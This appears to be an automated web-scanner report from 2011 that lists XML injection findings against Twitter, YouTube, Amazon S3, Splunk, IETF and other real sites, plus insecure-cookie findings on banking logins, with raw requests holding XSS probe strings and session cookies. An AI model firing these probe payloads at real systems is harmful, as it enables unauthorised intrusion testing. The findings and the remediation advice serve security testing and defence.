GET /widgets]]>>/tweet_button.html?_=1296947270249&count=horizontal&lang=de&text=Kledy.de%20-%20Bookmark%20%7C%20News%20%7C%20Videos%20%7C%20Bilder&url=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%2Fscript%25253Eef67307aec5%3D1&via=kledys HTTP/1.1 Host: platform0.twitter.com Proxy-Connection: keep-alive Referer: http://www.kledy.de/bookmarks.php?18fe2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef67307aec5=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; __utmv=43838368.lang%3A%20en; k=173.193.214.243.1296843754823170
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 05 Feb 2011 23:07:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /widgets/tweet_button.html]]>>?_=1296947270249&count=horizontal&lang=de&text=Kledy.de%20-%20Bookmark%20%7C%20News%20%7C%20Videos%20%7C%20Bilder&url=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%2Fscript%25253Eef67307aec5%3D1&via=kledys HTTP/1.1 Host: platform0.twitter.com Proxy-Connection: keep-alive Referer: http://www.kledy.de/bookmarks.php?18fe2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef67307aec5=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; __utmv=43838368.lang%3A%20en; k=173.193.214.243.1296843754823170
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 05 Feb 2011 23:07:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/cssbin]]>>/www-embed-vflPrzZNL.css HTTP/1.1 Host: s.ytimg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Cache-Control: public, max-age=31104000 Expires: Sun, 26 Dec 2032 06:12:01 GMT Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:59:08 GMT Server: lighttpd-yt/1.4.18 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/cssbin/www-embed-vflPrzZNL.css]]>> HTTP/1.1 Host: s.ytimg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:59:09 GMT Server: lighttpd-yt/1.4.18 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/jsbin]]>>/www-embed-vfl4nNnFQ.js HTTP/1.1 Host: s.ytimg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Cache-Control: public, max-age=31104000 Expires: Sun, 26 Dec 2032 06:12:01 GMT Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:59:11 GMT Server: lighttpd-yt/1.4.18 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/jsbin/www-embed-vfl4nNnFQ.js]]>> HTTP/1.1 Host: s.ytimg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:59:12 GMT Server: lighttpd-yt/1.4.18 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /new.cetrk.com]]>>/pages/scripts/0010/9642.js HTTP/1.1 Host: s3.amazonaws.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found x-amz-request-id: ADBA3FAC6761FDCC x-amz-id-2: kz7PrxEOVMDrf+Fx2O/bG6CfCR5xuAW2LJRbUvlCUAtAdhhKuIeiTi/ZIXHBfsKx Content-Type: application/xml Date: Sat, 05 Feb 2011 22:59:46 GMT Server: AmazonS3 Content-Length: 301
<?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>new.cetrk.com]]>></BucketName><RequestId>ADBA3FAC6761FDCC ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /new.cetrk.com/pages]]>>/scripts/0010/9642.js HTTP/1.1 Host: s3.amazonaws.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /new.cetrk.com/pages/scripts]]>>/0010/9642.js HTTP/1.1 Host: s3.amazonaws.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /new.cetrk.com/pages/scripts/0010]]>>/9642.js HTTP/1.1 Host: s3.amazonaws.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /new.cetrk.com/pages/scripts/0010/9642.js]]>> HTTP/1.1 Host: s3.amazonaws.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The sort parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the sort parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /apps/All/4.x/?sort=downloads]]>> HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; ssoj=1; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=962720tkf55lv04kpjb1vmi5u6; sso=173.193.214.243.1296942930878168; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmb=204527314.1.10.1296942566;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:00:12 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52168
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web4 ...[SNIP]... <p>Sideview Utils provides new utilities and modules that make it radically easier to develop and maintain custom user interfaces using Splunk's Advanced XML...</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /html]]>>/rfc2234] HTTP/1.1 Host: tools.ietf.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:42:48 GMT Server: Apache/2.2.16 (Debian) Vary: accept-language,accept-charset,Accept-Encoding Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 29631
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv=" ...[SNIP]... <a href="http://xml.resource.org"> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /html]]>>/rfc3492 HTTP/1.1 Host: tools.ietf.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:42:41 GMT Server: Apache/2.2.16 (Debian) Vary: accept-language,accept-charset,Accept-Encoding Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 29631
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv=" ...[SNIP]... <a href="http://xml.resource.org"> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /html]]>>/rfc3986 HTTP/1.1 Host: tools.ietf.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:42:55 GMT Server: Apache/2.2.16 (Debian) Vary: accept-language,accept-charset,Accept-Encoding Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 29631
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv=" ...[SNIP]... <a href="http://xml.resource.org"> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /ads]]>>/adjs.php?n=424430122&what=zone:4&exclude=,&referer=http%3A//burp/show/23 HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /ads/adjs.php]]>>?n=424430122&what=zone:4&exclude=,&referer=http%3A//burp/show/23 HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /ads]]>>/adlog.php?bannerid=75&clientid=52&zoneid=4&source=&block=0&capping=0&cb=d44f13e3bc6b9e50f3529e3826e3166b HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /ads/adlog.php]]>>?bannerid=75&clientid=52&zoneid=4&source=&block=0&capping=0&cb=d44f13e3bc6b9e50f3529e3826e3166b HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /index.php]]>> HTTP/1.1 Host: www.nmworkwear.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:37:10 GMT Server: Apache/2.2 Vary: accept-language,accept-charset Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en X-Pad: avoid browser bug Content-Length: 1018
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /favicon.ico]]>> HTTP/1.1 Host: www.peppernews.eu Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=47btvqa55udv0p4ltkl1kicifnu5suf1
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 17:52:59 GMT Server: Apache/2.2.10 (Linux/SUSE) Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1038
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /tracking]]>>/mpr.php?kunde=nokia&nwid=zx&keyword=bannerID&ctn=mg&zanpid=13849089C1902184109S14786739T1469378460744041488 HTTP/1.1 Host: www.traffictrack.de Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzEzODQ5MDg5QzE5MDIxODQxMDlTMTQ3ODY3MzlUJnpwYXIwPTY3N18xXzcyOHg5MF8zNjBfcHZjX2FkNG1hdGRlZGF1bHQ= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 17:42:12 GMT Server: Apache/2.2.8 (Linux/SUSE) Vary: accept-language,accept-charset Accept-Ranges: bytes P3P: policyref="http://www.traffictrack.de/w3c/p3p.xml", CP="ALL DSP COR NID" Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1604
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /tracking/mpr.php]]>>?kunde=nokia&nwid=zx&keyword=bannerID&ctn=mg&zanpid=13849089C1902184109S14786739T1469378460744041488 HTTP/1.1 Host: www.traffictrack.de Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzEzODQ5MDg5QzE5MDIxODQxMDlTMTQ3ODY3MzlUJnpwYXIwPTY3N18xXzcyOHg5MF8zNjBfcHZjX2FkNG1hdGRlZGF1bHQ= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 17:42:20 GMT Server: Apache/2.2.8 (Linux/SUSE) Vary: accept-language,accept-charset Accept-Ranges: bytes P3P: policyref="http://www.traffictrack.de/w3c/p3p.xml", CP="ALL DSP COR NID" Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1604
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
9. SSL cookie without secure flag set
There are 52 instances of this issue:
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The following cookie was issued by the application and does not have the secure flag set:
sessionId=nullCookie; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cib/CEBMainServlet/Login?FIORG=330&FIFID=124085066 HTTP/1.1 Host: cibng.ibanking-services.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:24:55 GMT Server: IBM_HTTP_Server Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-Cache Set-Cookie: wf=wf Set-Cookie: sessionId=nullCookie; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 9003
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title>Personal Savings from American Express : Welcome to Personal Savings from American ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.aspx?tabid=168&appl_code=MEMBERS HTTP/1.1 Host: ebus.ota.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"> <!--**********************************************************************************--> <!-- ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/logon/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/loyalty/us/rewards/mracctmgmt/acctsumm HTTP/1.1 Host: rewards.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en"> <head> <title> American Express - Mem ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mw0305l/mywebex/default.do HTTP/1.1 Host: splunk.webex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
